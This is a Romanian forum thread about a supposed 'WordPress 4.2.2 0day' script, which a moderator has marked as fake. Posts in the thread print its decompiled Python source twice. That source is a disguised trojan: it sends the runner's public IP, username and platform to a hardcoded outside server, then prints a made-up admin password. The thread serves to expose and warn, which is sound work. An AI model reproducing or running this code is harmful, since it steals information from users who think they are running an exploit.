Jump to content
1337

Wordpress 4.2.2 0day

Recommended Posts

Luat de pe un forum privat din afara.

Facut in Python, primul argument e site-ul.

Scoate userul si parola lui hashed.

Usage: wp4.2.2_0day.pyc site

// FAKE

Edited by Nytro

Share this post


Link to post
Share on other sites

Fisierul decompilat:

# Embedded file name: test.py

import sys

import uuid

from md5 import md5

from urllib2 import urlopen

import platform

import os

import time

x = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest()

x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform()

x2 = urlopen(x1).read()

if len(sys.argv) == 1:

sys.exit('No argument specified')

print 'Wordpress 4.2.2 0day exploit'

time.sleep(2)

print '[+] Trying: %s' % str(sys.argv[1])

time.sleep(5)

print '[+] user: admin'

time.sleep(3)

print x

Share this post


Link to post
Share on other sites

# Embedded file name: test.py
import sys
import uuid
from md5 import md5
from urllib2 import urlopen
import platform
import os
import time
x = '[+] password: ' + md5(str(uuid.uuid4())).hexdigest()
x1 = 'http://46.101.188.181/a.php?t=' + urlopen('http://ip.42.pl/raw').read() + '_' + os.getenv('USERNAME') + '_' + platform.platform()
x2 = urlopen(x1).read()
if len(sys.argv) == 1:
sys.exit('No argument specified')
print 'Wordpress 4.2.2 0day exploit'
time.sleep(2)
print '[+] Trying: %s' % str(sys.argv[1])
time.sleep(5)
print '[+] user: admin'
time.sleep(3)
print x

Share this post


Link to post
Share on other sites

Well congrats, vad ca unii verifica ce ruleaza, altii nu prea.Asta tre' sa fie o lectie pentru toti. @Nytro trebuia sa-l lasi iar ceilalti trebuiau sa nu publice codul sursa.

rezultate:

qQTPYfd.png

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...